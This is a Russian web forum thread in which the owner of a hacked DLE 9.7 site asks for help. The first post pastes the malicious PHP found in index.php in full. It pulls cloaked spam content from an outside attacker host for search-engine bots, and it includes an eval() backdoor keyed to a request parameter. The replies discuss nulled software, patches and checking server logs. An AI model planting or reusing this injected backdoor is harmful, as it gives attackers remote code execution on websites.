X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт dle 9.7
vasyatko
vasyatko
Topic Starter сообщение 20.11.2012, 19:38; Ответить: vasyatko
Сообщение #1


Завсегдатай
*****


Группа: Active User
Сообщений: 871
Регистрация: 2.6.2008
Поблагодарили: 215 раз
Репутация:   49  


Взломали сайт dle 9.7
На главной странице
Fatal error: Call to undefined function gzinflate() in /home/admin/data/www/vkonatke.in/get.php(3) : eval()'d code on line 1

В index.php


<?php
//###==###
error_reporting(0);

$host = "http://vkonatke.in/get.php";

$ident = "qwerty";



        $bot = urlencode($_SERVER['HTTP_USER_AGENT']);

    if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) {

        $id = urlencode("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);

        $url = $host."?id=".$id."&charset=w&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

    }

        $url = $host."?code=code&bot=".$bot;

            if(ini_get("allow_url_fopen") == 1) {

                echo file_get_contents($url);

            }elseif(function_exists('curl_init')) {

                $ch = curl_init($url);

                curl_setopt($ch, CURLOPT_HEADER, FALSE);

                curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

                $result = curl_exec($ch);

                curl_close($ch);

            echo $result;

        }

        if($_REQUEST["c"] == $ident) eval(stripslashes($_REQUEST["code"]));


//###==###
?>


--------------------
2
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.11.2012, 20:18; Ответить: fioru
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 508
Регистрация: 30.11.2010
Из: Смоленск
Поблагодарили: 172 раза
Репутация:   37  


Раз пишите тут а не на официальном, видимо пользуетесь null'ом, а там шеллов хватает, чему тогда удивляться что вас взломали?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OldSpice
OldSpice
сообщение 20.11.2012, 20:30; Ответить: OldSpice
Сообщение #3


Старожил
******

Группа: Active User
Сообщений: 1572
Регистрация: 17.8.2011
Из: Латвия
Поблагодарили: 244 раза
Репутация:   48  


http://dle-news.ru/bags/v97/1538-patchi-be...97-i-nizhe.html


--------------------
Вот тут я беру контент для трех групп вконтакте :)
Наполняю паблики на автомате, за 3 минуты в день!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
tsa
tsa
сообщение 20.11.2012, 20:51; Ответить: tsa
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 330
Регистрация: 6.2.2011
Из: manucoz.ru
Поблагодарили: 17 раз
Репутация:   -7  


Покупайте лицензию и не каких проблем не будет =) а нулл это дело такое... тож когда то стял нул взломали перешол на лицуху и не каких проблем больше небыло happy.gif


--------------------


Поблагодарили: (0)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vasyatko
vasyatko
Topic Starter сообщение 20.11.2012, 22:39; Ответить: vasyatko
Сообщение #5


Завсегдатай
*****


Группа: Active User
Сообщений: 871
Регистрация: 2.6.2008
Поблагодарили: 215 раз
Репутация:   49  


fioru и tsa просто ненадо нулл откуда попало качать. Здесь дело не в нулл версии.


OldSpice
Степень опасности: Высокая при использовании включенной настройки register_globals

Эта функция была отключена. Был только включен magic_quotes_gpc


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 20.11.2012, 22:41; Ответить: fioru
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 508
Регистрация: 30.11.2010
Из: Смоленск
Поблагодарили: 172 раза
Репутация:   37  


vasyatko, я их вообще не качаю)
А вот вы видимо качаете где поподя, хотя не исключено что у Вас вообще дыры на стороне серверного ПО
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 20.11.2012, 23:31; Ответить: Rampage
Сообщение #7


Участник
***

Группа: User
Сообщений: 240
Регистрация: 20.11.2010
Из: localhost
Поблагодарили: 68 раз
Репутация:   24  


а логи сервера есть?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 20.11.2012, 23:39; Ответить: kagtus
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


помочь очистить???


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GET_ini
GET_ini
сообщение 21.11.2012, 18:45; Ответить: GET_ini
Сообщение #9


Участник
***

Группа: User
Сообщений: 218
Регистрация: 6.11.2012
Из: Украина
Поблагодарили: 31 раз
Репутация:   6  


Rampage верно подмечено!

ТС покажи логи! Через какой именно файл Вас Геттили и инклудили smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 21.11.2012, 19:01; Ответить: AleZ
Сообщение #10


Частый гость
**

Группа: User
Сообщений: 70
Регистрация: 7.6.2012
Из: Москва
Поблагодарили: 28 раз
Репутация:   6  


Зря сразу про нуллы писать начали, да и версия 9.7 весьма устойчивая к взломам (но и тут без патча не обошлось sad.gif ). В последнее время зачастую ломают через различные модули каталогов, переходов и так далее. Если движок интенсивно обновляется, то авторы модулей не спешат. Еще, не стоит снимать со счета права на запись в разные директории,шаблоны с сомнительных сайтов, проблемы хостера, отсутствие антивруса, криворукость и угнанные пароли. В первую очередь стоит снять логи с сервера и посмотреть, откуда лезли и какие файлы затронули еще.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Стану Вашим рефералом. Готовый трастовый сайт в наличии!
0 referer 19 Сегодня, 1:43
автор: referer
Открытая тема (нет новых ответов) Продам сайт под развитие
Под будущий СДЛ, тематика бизнес, возраст 1 год
6 abafons 1413 Вчера, 12:55
автор: abafons
Открытая тема (нет новых ответов) Попинайте сайт
6 yanat 720 Вчера, 12:12
автор: Iga
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
143 contex1 65218 Вчера, 9:07
автор: contex1
Открытая тема (нет новых ответов) Нужен новостник на сайт
Требуется новостник для сотрудничества
6 opanas 833 Вчера, 1:50
автор: belfagor


 



RSS Текстовая версия Сейчас: 18.12.2017, 1:55
Дизайн